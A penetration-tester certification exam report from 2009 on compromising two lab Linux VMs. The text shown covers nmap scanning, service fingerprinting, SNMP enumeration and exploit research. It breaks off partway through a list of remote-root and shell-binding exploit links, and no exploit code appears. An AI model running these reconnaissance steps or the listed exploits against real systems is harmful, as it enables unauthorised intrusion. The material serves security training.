Certified Penetration Tester (CPT) Practical Examination Report

You might also like

You are on page 1of 63

Certified Penetration Tester (CPT)

Practical Examination Report

Matthew Tiedeman
mtiedeman@gmail.com
February 21st, 2009

Contents
1.
2.
3.
4.

Overview.......................................................................................4
Assumptions..................................................................................4
Tools.............................................................................................4
Penetration test details....................................................................5
A. Scanning...................................................................................5
i. Baseline scan of network..........................................................5
ii. Port scanning and OS fingerprinting...........................................5
iii. Service fingerprinting - TCP services.........................................7
iv. Service fingerprinting - Validation of Apache HTTP service............9
v. SNMP enumeration................................................................11
vi. Service fingerprinting - UDP services.......................................13
B. Sites used during the exploit research phase.................................14
C. Remote exploits........................................................................15
i. Research via anyside.org.........................................................15
ii. Exploits round 1.................................................................18
iii. Research via secwatch.org.....................................................19
iv. Exploits round 2.................................................................19
D. User discovery..........................................................................19
i. Abuse of finger......................................................................19
E. Brute force password guessing....................................................21
i. Discovery of password for user account..................................21
ii. Discovery of password for cptvm1 and cptvm2 accounts........23
F. Research of cptvm1 and cptvm2 hosts..........................................25
i. cptvm1.................................................................................25
ii. cptmv2................................................................................27
G. Penetration of cptvm1...............................................................29
i. Local exploit research via anyside.org.......................................29
ii. Local exploit research via secwatch.org....................................32
iii. Privilege escalation using a Kernel VMA exploit..........................33
iv. Maintaining access via creation of a new r00t account.............34
v. Gathering the shadow password file.........................................35
H. Cracking passwords of the cptvm1 host.......................................35
i. Cracking of user, cptvm1 and cptvm2................................35
I. Penetration of cptvm2................................................................36
i. Privilege escalation using a Kernel vmsplice exploit.....................36
ii. Maintaining access via creation of a new r00t account..............37
iii. Gathering the shadow password file........................................38
J. Cracking passwords of the cptvm2 host........................................39
i. Cracking of cptvm1, cptvm2, root and r00t.......................39
K. Cracking passwords of the cptvm1 host round 2.........................40
i. Cracking of root and r00t...................................................40
L. Ultimate goal............................................................................43
i. Cptvm1 and ctpvm2 hosts compromised...................................43
ii. Passwords for root accounts on cptvm1 and cptvm2...................43

M. Lessons learned.......................................................................43
i. Searching exploit sites............................................................43
ii. Attack vectors.......................................................................44
5. Appendix.....................................................................................44
A. Source code for the Kernel 2.4 VMA exploit...................................44
B. Source code for the Kernel 2.6 vmsplice exploit.............................59

1. Overview

The certified pen tester practical examination consists of the compromising of


two VMware virtual machines, the recovery of the root passwords for each
system and the creation of a penetration report.
The penetration report will contain, at a minimum, the details of all of the
penetration test findings and a prioritized list of the vulnerabilities discovered.
The penetration report should be submitted for review to:
exams@iacertification.org
The following information was provided as part of the examination
documentation:
! Virtual machine 1 (cptvm1) VM containing a Linux system.
" The system has the following static configuration:
# IP Address: 192.168.1.200
# Netmask: 255.255.255.0
# Gateway: 192.168.1.254
# DNS: 192.168.1.254
! Virtual machine 2 (cptvm2) VM containing a Linux system.
" The system has been configured to gain its network information via
DHCP.
! Information gathered from one of the VM's during the penetration test
may be required in order to compromise the other VM.

2. Assumptions
!

While the penetration testing process consists of 5 phases


(reconnaissance, scanning, penetration, maintaining connectivity and
covering tracks), the reconnaissance and covering tracks phases will not
be covered within this report.
Stealthy scanning and penetration techniques will not be used.

3. Tools

The following tools were used during the completion of the penetration testing
practical examination.
! back|track3 Collection of penetration tester utilities.
! VMware Fusion VMware virtual host software for OSX.
! Apple OSX Host operating system used to execute VMware Fusion.
! nmap Port scanning, fingerprinting, swiss army knife utility.
! httprint HTTP fingerprinting utility.
! snmpenum.pl SNMP enumeration utility.
! vi Text editor.
! emacs A swiss army knife editor (text/source code/etc).
! gcc C, etc compiler.
! tftp Trivial File Transfer Protocol client
! ssh Secure shell client

!
!
!
!
!
!
!
!

finger Finger utility.


bash shell scripting Small scripts and main interactive shell.
sed A stream editing utility.
awk Lightweight regular expression text scripting utility.
sort Unix text sort utility.
hydra Multiple protocol dictionary attack utility.
aspell Dictionary utility.
John the ripper, password cracker.

4. Penetration test details


A. Scanning
i. Baseline scan of network
An initial scan of the network was performed to establish a baseline of
the network configuration.
The gateway (192.168.1.1), host computer (192.168.1.30), back|
track3 (192.168.1.102), cptvm2 (192.168.1.104) and cptvm1
(192.168.1.200) were identified. At this point, the identification of the
hosts and their use comes mainly from the exam documentation and
the knowledge of how the local network is configured.
bt live # nmap -sP -n 192.168.1.1/24
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-19 07:59 GMT
Host 192.168.1.1 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Cisco-Linksys)
Host 192.168.1.30 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.102 appears to be up.
MAC Address: XX:XX:XX:XX:XX:XX (Apple Computer)
Host 192.168.1.104 appears to be up.
MAC Address: 00:0C:29:3B:43:BC (VMware)
Host 192.168.1.200 appears to be up.
MAC Address: 00:0C:29:27:60:0A (VMware)
Nmap done: 256 IP addresses (4 hosts up) scanned in 3.269 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
cptvm2 (192.168.1.104)

ii. Port scanning and OS fingerprinting


To determine the open ports and host operating system, a port scan
and OS fingerprint of the specific VM IP addresses was conducted. The
port scan included all TCP ports from 1 to 65535. Due to the
differences between TCP and UDP, the UDP scan was completed only
on ports from 1 to 1024.

Based upon the list of open ports, it can be concluded that cptvm1,
192.168.1.200, is most likely a server. While cptvm2, 192.168.1.104,
is most likely a client workstation.
bt live # nmap -sS -O -n -p1-65535 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:04 GMT
Interesting ports on 192.168.1.200:
Not shown: 65517 closed ports
PORT
STATE SERVICE
7/tcp
open echo
21/tcp
open ftp
22/tcp
open ssh
23/tcp
open telnet
79/tcp
open finger
80/tcp
open http
109/tcp
open pop2
110/tcp
open pop3
111/tcp
open rpcbind
143/tcp
open imap
199/tcp
open smux
443/tcp
open https
686/tcp
open unknown
993/tcp
open imaps
995/tcp
open pop3s
6000/tcp open X11
32768/tcp open unknown
32770/tcp open sometimes-rpc3
MAC Address: 00:0C:29:27:60:0A (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.18 - 2.4.32 (likely embedded)
Uptime: 0.121 days (since Tue Jan 20 09:11:03 2009)
Network Distance: 1 hop
Interesting ports on 192.168.1.104:
Not shown: 65532 closed ports
PORT
STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
939/tcp open unknown
MAC Address: 00:0C:29:3B:43:BC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.23
Uptime: 0.106 days (since Tue Jan 20 09:32:16 2009)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 19.321 seconds
bt live # nmap -sU -T5 -n -p1-1024 192.168.1.200 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 15:53 GMT
Warning: Giving up on port early because retransmission cap hit.
Stats: 0:00:20 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 22.18% done; ETC: 15:54 (0:01:11 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.37% done; ETC: 15:54 (0:01:09 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan
UDP Scan Timing: About 24.89% done; ETC: 15:54 (0:01:08 remaining)

Stats: 0:00:23 elapsed; 0 hosts completed (2 up), 2 undergoing UDP Scan


UDP Scan Timing: About 25.05% done; ETC: 15:54 (0:01:08 remaining)
Interesting ports on 192.168.1.200:
Not shown: 870 open|filtered ports, 151 closed ports
PORT
STATE SERVICE
7/udp open echo
13/udp open daytime
37/udp open time
MAC Address: 00:0C:29:27:60:0A (VMware)
All 1024 scanned ports on 192.168.1.104 are open|filtered (872) or closed
(152)
MAC Address: 00:0C:29:3B:43:BC (VMware)
Nmap done: 2 IP addresses (2 hosts up) scanned in 146.229 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: Linux 2.4.18 - 2.4.32
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
UDP ports: 7, 13, 37
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939

iii. Service fingerprinting - TCP services


As a TCP port number does not directly identify a service,
fingerprinting of the services listening on the ports is required.
The majority of the TCP services were fingerprinted via nmap. The
remaining services, port 109, port 993 and port 995 will require
further research to properly fingerprint.
bt live # nmap -sV --version-all -n -p7,21-23,79,80,109111,143,199,443,686,993,995,6000,32768,32770 192.168.1.200
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:27 GMT
Interesting ports on 192.168.1.200:
PORT
STATE SERVICE VERSION
7/tcp
open echo
21/tcp
open ftp
vsftpd 1.1.3
22/tcp
open ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
open telnet
Linux telnetd
79/tcp
open finger
Linux fingerd
80/tcp
open http
Apache httpd 2.0.40 ((Red Hat Linux))
109/tcp
open pop2?
110/tcp
open pop3
ipopd 2001.78rh
111/tcp
open rpcbind
2 (rpc #100000)
143/tcp
open imap
UW Imapd 2001.315rh
199/tcp
open smux
Linux SNMP multiplexer
443/tcp
open ssl/http Apache httpd 2.0.40 ((Red Hat Linux))
686/tcp
open rquotad
1-2 (rpc #100011)
993/tcp
open imaps?
995/tcp
open pop3s?

6000/tcp open X11


(access denied)
32768/tcp open status
1 (rpc #100024)
32770/tcp open mountd
1-3 (rpc #100005)
1 service unrecognized despite returning data. If you know the
service/version, please submit the following fingerprint at
http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port109-TCP:V=4.60%I=9%D=1/20%Time=4975C33E%P=i686-pc-linux-gnu%r(Gener
SF:icLines,4B,"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server
SF:\x20ready\r\n-\x20Missing\x20or\x20null\x20command\r\n")%r(Verifier,60,
SF:"\+\x20POP2\x20\[192\.168\.1\.200\]\x20v2001\.63rh\x20server\x20ready\r
SF:\n-\x20Bogus\x20or\x20out\x20of\x20sequence\x20command\x20-\x20SUBSCRIB
SF:E\r\n");
MAC Address: 00:0C:29:27:60:0A (VMware)
Service Info: Host: 192.168.1.200; OSs: Unix, Linux
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.977 seconds
bt live # nmap -sV --version-all -n -p22,111,939 192.168.1.104
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:33 GMT
Interesting ports on 192.168.1.104:
PORT
STATE SERVICE VERSION
22/tcp open ssh
OpenSSH 4.3 (protocol 2.0)
111/tcp open rpcbind 2 (rpc #100000)
939/tcp open status
1 (rpc #100024)
MAC Address: 00:0C:29:3B:43:BC (VMware)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.358 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: Linux 2.4.18 - 2.4.32
TCP ports: 7, 21, 22, 23, 79, 80, 109,
6000, 32768, 32770
UDP ports: 7, 13, 37
TCP services:
7/tcp
echo
21/tcp
ftp
22/tcp
ssh
23/tcp
telnet
79/tcp
finger
80/tcp
http
109/tcp
POSSIBLY pop2
110/tcp
pop3
111/tcp
rpcbind
143/tcp
imap
199/tcp
smux
443/tcp
ssl/http
686/tcp
rquotad
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
32770/tcp
mountd
cptvm2 (192.168.1.104)
Operating system: Linux

110, 111, 143, 199, 443, 686, 993, 995,

vsftpd 1.1.3
OpenSSH 3.5p1 (protocol 1.99)
Linux telnetd
Linux fingerd
Apache httpd 2.0.40 (Red Hat Linux)
ipopd 2001.78rh
2 (rpc #100000)
UW Imapd 2001.315rh
Linux SNMP multiplexer
Apache httpd 2.0.40 (Red Hat Linux)
1-2 (rpc #100011)

1 (rpc #100024)
1-3 (rpc #100005)

Kernel version: Linux 2.6.9 - 2.6.23


TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status

OpenSSH 4.3 (protocol 2.0)


2 (rpc #100000)
1 (rpc #100024)

iv. Service fingerprinting - Validation of Apache HTTP service


Often the banner for a web server is disguised to hide the true web
server that is running. The httprint utility was utilized to insure that
the web server is actually Apache.
In this case, the use of the Apache web server was validated.
bt linux # httprint -h 192.168.1.200 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
httprint@net-square.com
Finger Printing on http://192.168.1.200:80/
Finger Printing Completed on http://192.168.1.200:80/
-------------------------------------------------Host: 192.168.1.200
Derived Signature:
Apache/2.0.40 (Red Hat Linux)
9E431BC86ED3C295811C9DC5811C9DC5811C9DC5505FCFE84276E4BB811C9DC5
0D7645B5811C9DC52A200B4CCD37187C11DDC7D7811C9DC5811C9DC58A91CF57
FCCC535BE2CE6920FCCC535B811C9DC5E2CE6927050C5D33E2CE69279E431BC8
6ED3C295E2CE69262A200B4CE2CE6920E2CE6920E2CE6920E2CE6920E2CE6923
E2CE6923E2CE6920811C9DC5E2CE6927E2CE6923
Banner Reported: Apache/2.0.40 (Red Hat Linux)
Banner Deduced: Apache/2.0.x
Score: 106
Confidence: 63.86
-----------------------Scores:
Apache/2.0.x: 106 63.86
Apache/1.3.27: 101 53.96
Apache/1.3.[4-24]: 101 53.96
Apache/1.3.26: 100 52.11
Apache/1.3.[1-3]: 96 45.12
TUX/2.0 (Linux): 89 34.42
Apache/1.2.6: 86 30.39
Agranat-EmWeb: 76 19.19
Orion/2.0x: 73 16.45
Microsoft-IIS/6.0: 69 13.20
Stronghold/4.0-Apache/1.3.x: 68 12.45
Apache-Tomcat/4.1.29: 67 11.74
Lotus-Domino/6.x: 65 10.38
AssureLogic/2.0: 64 9.74
Oracle Servlet Engine: 58 6.41
RomPager/4.07 UPnP/1.0: 54 4.64
cisco-IOS: 54 4.64
Netscape-Enterprise/6.0: 53 4.25
Netscape-Enterprise/4.1: 53 4.25
AkamaiGHost: 50 3.19
CompaqHTTPServer/1.0: 47 2.30
HP-ChaiServer/3.0: 46 2.04
Microsoft-IIS/5.0: 44 1.56

Microsoft-IIS/5.0 ASP.NET: 44 1.56


Microsoft-IIS/5.1: 44 1.56
Netscape-Enterprise/3.5.1G: 44 1.56
Com21 Cable Modem: 44 1.56
thttpd: 44 1.56
Lexmark Optra Printer: 44 1.56
Boa/0.94.11: 44 1.56
WebSitePro/2.3.18: 44 1.56
Stronghold/2.4.2-Apache/1.3.x: 43 1.34
Xerver_v3: 43 1.34
ServletExec: 41 0.96
Zope/2.6.0 ZServer/1.1b1: 41 0.96
WebLogic XMLX Module 8.1: 41 0.96
Microsoft ISA Server (external): 40 0.79
Jetty (unverified): 40 0.79
IDS-Server/3.2.2: 38 0.48
CompaqHTTPServer/4.2: 23 0.45
squid/2.5.STABLE5: 23 0.45
SunONE WebServer 6.0: 22 0.45
JRun Web Server: 22 0.45
Microsoft-IIS/URLScan: 21 0.44
NetWare-Enterprise-Web-Server/5.1: 24 0.44
TightVNC: 24 0.44
Linksys WRTP54G: 24 0.44
GWS/2.1 Google Web Server: 24 0.44
Netscape-Enterprise/3.6: 20 0.43
MiniServ/0.01 Webmin: 20 0.43
fnord: 20 0.43
MiniServ/0.01: 20 0.43
Tcl-Webserver/3.4.2: 20 0.43
Zeus/4.0: 25 0.43
Hewlett Packard xjet: 25 0.43
HP Jet-Direct Print Server: 25 0.43
Resin/3.0.8: 19 0.42
RealVNC/4.0: 26 0.41
WebLogic Server 8.x: 27 0.39
WebLogic Server 8.1: 27 0.39
Linksys with Talisman firmware: 27 0.39
Oracle XML DB/Oracle9i: 17 0.38
Microsoft-IIS/5.0 Virtual Host: 17 0.38
Adaptec ASM 1.1: 17 0.38
Linksys AP2: 28 0.36
BaseHTTP/0.3 Python/2p3.3 edna/0.4: 28 0.36
Lotus-Domino/5.x: 15 0.33
Netscape-Enterprise/3.6 SP2: 29 0.32
Netscape-Enterprise/3.5.1: 14 0.30
EHTTP/1.1: 14 0.30
Tomcat Web Server/3.2.3: 14 0.30
Surgemail webmail (DManager): 14 0.30
Jetty/4.2.2: 30 0.27
Netscape-Enterprise/4.1: 12 0.25
Zeus/4.1: 36 0.23
Intel NetportExpressPro/1.0: 36 0.23
Cisco-HTTP: 11 0.22
Cisco Pix 6.2: 11 0.22
AOLserver/3.4.2-3.5.1: 31 0.21
Jana Server/1.45: 31 0.21
EMWHTTPD/1.0: 31 0.21
Ipswitch-IMail/8.12: 31 0.21
RemotelyAnywhere: 10 0.19
3Com/v1.0: 10 0.19
Microsoft ISA Server (internal): 10 0.19
Allied Telesyn Ethernet switch: 10 0.19
WebSENSE/1.0: 10 0.19
Netgear MR814v2 - IP_SHARER WEB 1.0: 10 0.19

MikroTik RouterOS: 35 0.12


Zeus/4_2: 33 0.07
CompaqHTTPServer-SSL/4.2: 33 0.07
Microsoft-IIS/4.0: 34 0.02
Domino-Go-Webserver/4.6.2.8: 34 0.02
AOLserver/3.5.6: 34 0.02
dwhttpd (Sun Answerbook): 34 0.02
SMC Wireless Router 7004VWBR: 34 0.02
Belkin Wireless router: 34 0.02
VisualRoute 2005 Server Edition: 34 0.02
JC-HTTPD/1.14.18: 34 0.02
Ubicom/1.1: 2 0.01
Ubicom/1.1 802.11b: 2 0.01
Tanberg 880 video conf: 2 0.01
Snap Appliances, Inc./3.x: 1 0.00
Linksys AP1: 0 0.00
Linksys Router: 0 0.00
Linksys Print Server: 0 0.00
NetBuilderHTTPDv0.1: 0 0.00
NetPort Software 1.1: 0 0.00
Linksys BEFSR41/BEFSR11/BEFSRU31: 0 0.00
MailEnable-HTTP/5.0: 0 0.00

v. SNMP enumeration
The snmp service was identified as listening on port 199/tcp of the
cptvm1 host, 192.168.1.200. In addition, the cptvm1 host OS was
identified as Linux. With these two factors in mind, the snmpenum.pl
utility can be utilized to gather system information. Of particular
interest are the UDP services currently running on the hosts.
Along with UDP ports 7, 13, 37, 111, 123, 161, 162, 631 and 683,
various process and service information was discovered.
bt snmpenum # snmpenum.pl 192.168.1.200 public linux.txt
---------------------------------------UPTIME
---------------------------------------1 hour, 40:22.46
---------------------------------------HOSTNAME
---------------------------------------cptvm1
---------------------------------------RUNNING SOFTWARE PATHS
---------------------------------------init
keventd
kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
---------------------------------------RUNNING PROCESSES
---------------------------------------init
keventd

kapmd
ksoftirqd_CPU0
kswapd
kscand/DMA
kscand/Normal
kscand/HighMem
bdflush
---------------------------------------MOUNTPOINTS
---------------------------------------/
/proc/bus/usb
/boot
/dev/shm
Real Memory
Swap Space
Memory Buffers
---------------------------------------SYSTEM INFO
---------------------------------------Linux cptvm1 2.4.20-8 #1 Thu Mar 13 17:54:28 EST 2003 i686
---------------------------------------LISTENING UDP PORTS
---------------------------------------7
13
37
111
123
161
162
631
683
---------------------------------------LISTENING TCP PORTS
---------------------------------------7
21
22
23
79
80
109
110
111
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)
109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh

199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status

OpenSSH 4.3 (protocol 2.0)


2 (rpc #100000)
1 (rpc #100024)

vi. Service fingerprinting - UDP services


Like TCP ports, UDP ports do not directly identify services. Therefore,
the services listening on the UDP ports will need to be fingerprinted.
All UDP services except port 631 were properly fingerprinted.
bt linux # nmap -sU -sV --version-all -n -p7,13,37,111,123,161,162,631,683
192.168.1.200
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:54 GMT
Interesting ports on 192.168.1.200:
PORT
STATE
SERVICE VERSION
7/udp
open
echo
13/udp open
daytime
37/udp open
time
(32 bits)
111/udp open
rpcbind
2 (rpc #100000)
123/udp open|filtered ntp
161/udp open
snmp
SNMPv1 server (public)
162/udp open|filtered snmptrap
631/udp open|filtered unknown
683/udp open
rquotad
1-2 (rpc #100011)
MAC Address: 00:0C:29:27:60:0A (VMware)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.467 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995,
6000, 32768, 32770
TCP services:
7/tcp
echo
21/tcp
ftp
vsftpd 1.1.3
22/tcp
ssh
OpenSSH 3.5p1 (protocol 1.99)
23/tcp
telnet
Linux telnetd
79/tcp
finger
Linux fingerd
80/tcp
http
Apache httpd 2.0.40 (Red Hat Linux)

109/tcp
POSSIBLY pop2
110/tcp
pop3
ipopd 2001.78rh
111/tcp
rpcbind
2 (rpc #100000)
143/tcp
imap
UW Imapd 2001.315rh
199/tcp
smux
Linux SNMP multiplexer
443/tcp
ssl/http
Apache httpd 2.0.40 (Red Hat Linux)
686/tcp
rquotad
1-2 (rpc #100011)
993/tcp
imaps
995/tcp
pop3s
6000/tcp
X11
32768/tcp
status
1 (rpc #100024)
32770/tcp
mountd
1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp
echo
13/udp
daytime
37/udp
time (32 bits)
111/udp
rpcbind
2 (rpc #100000)
123/udp
ntp
161/udp
snmp
SNMPv1 server (public)
162/udp
snmptrap
631/udp
unknown
683/udp
rquotad
1-2 (rpc #100011)
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp
ssh
111/tcp
rpcbind
939/tcp
status

OpenSSH 4.3 (protocol 2.0)


2 (rpc #100000)
1 (rpc #100024)

B. Sites used during the exploit research phase


There are various sites available for the research of software exploits.
While the following list is not all inclusive, it does provide fairly good
coverage:
http://www.milw0rm.com - Exploit database.
http://secwatch.org/ - Exploits database
http://packetstormsecurity.org - Exploits database
http://www.securityforest.com/ - Exploits database and securityforest
exploits update script.
http://anyside.org/ - Exploits database
http://www.remote-exploit.org/ - Contains back|track, milw0rm and
securityfocus exploit update scripts.
http://www.brandonhutchinson.com/ - Contains packetstormsecurity
exploits update script.
http://www.governmentsecurity.org/exploits.php Exploit information.
http://insecure.org/sploits.html Exploit information.
http://www.securiteam.com/exploits/ - Exploit information.
http://www.iss.net/ Exploits information.
http://www.hoobie.net/security/exploits/ - Exploits information.
http://www.vupen.com/exploits/ - Archive of private exploits and
proof-of-concept codes developed by VUPEN Security.

http://www.security-protocols.com - Security advisories.


http://metasploit.org Exploit platform.
http://www.malware.com/ - Exploits information.
http://www.immunitysec.com/index.shtml Exploit platform.
http://www.datastronghold.com Exploit information and hacking
techniques.
http://www.illmob.org/ - Exploit information.

C. Remote exploits
i. Research via anyside.org
A list of exploits was downloaded from the anyside.org web site. The
list consisted of a small description of the exploit and a link to the
source code for the exploit. A list of search items was then created
based upon the findings from the scanning phase.
$ cat ../commands/remote-search.txt
apache
finger
imap
ipop
ntp
open ssh
openssh
rpc
rpcbind
rpcmount
rpcstatus
rquota
snmp
snmptrap
telnet
vs ftp
vsftp
x11

The search items list and the exploit list were used to gain a list of
possible remote exploits for the cptvm1 host.
$ grep exploits\/remote exploits_list.txt | grep -w -i -f ../commands/remotesearch.txt | sort -u > possible_remote_200.txt
$ ll
total 1664
drwxr-xr-x
drwxr-xr-x
-rw-r--r--rw-r--r--rw-r--r--

6
16
1
1
1

matt
matt
matt
matt
matt

matt
matt
matt
matt
matt

204
544
126720
702666
9376

Feb 21 14:46 ./
Feb 21 14:46 ../
Feb 6 14:40 exploits_list.db.tgz
Sep 21 05:52 exploits_list.txt
Feb 6 14:43 possible_remote_200.txt

$ cat possible_remote_200.txt
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote
Windows exploit for the RPC DCOM long filename heap overflow discovered by
NSFOCUS. Related advisory
....;http://www.anyside.org/exp/exploits/remote/101_ncat.c;MailEnable , IMAP
Service, Remote Buffer Overflow Exploit v0.4

....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit


- Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/DComExpl_UnixWin32.zip;Windows
port of the remote exploit utilizing the DCOM RPC overflow originally coded by
H D Moore.
....;http://www.anyside.org/exp/exploits/remote/Mercury-IMAP-exp.txt;Exploit
code for the Mercury32 IMAP Rename buffer overflow
....;http://www.anyside.org/exp/exploits/remote/MercuryMail-exp.txt;Mercury
Mail 4.01 (Pegasus) IMAP Buffer Overflow
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit
for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the
openssl-too-open exploit by Solar Eclipse and offers more than 130 targets
including various flavors of Linux.
....;http://www.anyside.org/exp/exploits/remote/apache-squ1rt.c;Apache <=
2.0.52 HTTP GET Remote Denial of Service Exploit
....;http://www.anyside.org/exp/exploits/remote/apache_xpl.txt;Apache 2.0.52
and earlier DoS
....;http://www.anyside.org/exp/exploits/remote/dcom.c;Remote exploit
utilizing the DCOM RPC overflow discovered by LSD. Includes targets for
Windows 2000 and XP. Binds a shell on port 4444.
....;http://www.anyside.org/exp/exploits/remote/getusr.c;Exploit that makes
use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
....;http://www.anyside.org/exp/exploits/remote/httpdDoS-pl.txt;Denial of
service test exploit for the flaw in Apache httpd 2.0.49
....;http://www.anyside.org/exp/exploits/remote/ipswitch.c;Ipswitch IMAP
Server "LOGIN" Command Remote Stack Overflow Exploit
....;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.tar.gz;Apache
1.3.*-2.0.48 remote users disclosure exploit - Checks Apache webservers for a
wrong default configuration of mod_userdir which allows account name guessing
and then attempts to login to the found accounts with ftp. Effective against
Linux and *BSD boxes.
....;http://www.anyside.org/exp/exploits/remote/rpc!exec.c;Windows remote rpc
dcom exploit which bypasses non-executable stack protection by using return
into libc. Tested against OverflowGuard and StackDefender (with kernel32
imagebase randomization) running on Windows 2000 SP0 and Windows XP SP0.
....;http://www.anyside.org/exp/exploits/remote/telnet.c;Solaris 2.6, 7, and 8
telnetd remote exploit.
....;http://www.anyside.org/exp/exploits/remote/wgetusr.c;Exploit that makes
use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
2003-12-8;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.c;Apache
1.3.*-2.0.48 mod_userdir remote users disclosure Exploit
2003-4-1;http://www.anyside.org/exp/exploits/remote/rpcexp.c;Microsoft Windows
RPC Locator Service remote exploit. Binds cmd.exe to port 5151. Tested again
Windows 2000 SP3 and Windows NT 4 SP6a.
2003-9-18;http://www.anyside.org/exp/exploits/remote/mounty.c;Remote root
exploit for rpc.mountd that makes use of the xlog off-by-one vulnerability
discussed
2004-1-4;http://www.anyside.org/exp/exploits/remote/wts_bo.c;Jordan Windows
Telnet Server v1.2 remote buffer overflow exploit. Binds a shell on port 9191.
Tested on Win32 and Unix.
2004-4-25;http://www.anyside.org/exp/exploits/remote/lsasrv.c;Windows
Lsasrv.dll RPC ms04011 buffer overflow Remote Exploit
2004-5-2;http://www.anyside.org/exp/exploits/remote/HOD-ms04011-lsasrvexpl.c;MS04011 Lsasrv.dll RPC buffer overflow remote exploit
2004-9-24;http://www.anyside.org/exp/exploits/remote/mdaemon_imap.c;Remote
buffer overflow in MDaemon IMAP and SMTP server
2004-9-3;http://www.anyside.org/exp/exploits/remote/sm00nycourier_imap_fsx.c;Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format
String Exploit
2005-03-17;http://www.anyside.org/exp/exploits/remote/goodtech.c;GoodTech
Telnet Server < 5.0.7 Remote Buffer Overflow Exploit
2005-04-25;http://www.anyside.org/exp/exploits/remote/goodtech_expl.c;GoodTech
Telnet Server < 5.0.7 Remote BoF Exploit
2005-04-30;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP
proxy daemon format string exploit

2005-06-07;http://www.anyside.org/exp/exploits/remote/2005060701.txt;IPSwitch
IMAP Server LOGON Remote Stack Overflow
2005-09-20;http://www.anyside.org/exp/exploits/remote/2005092001.txt;Mercury
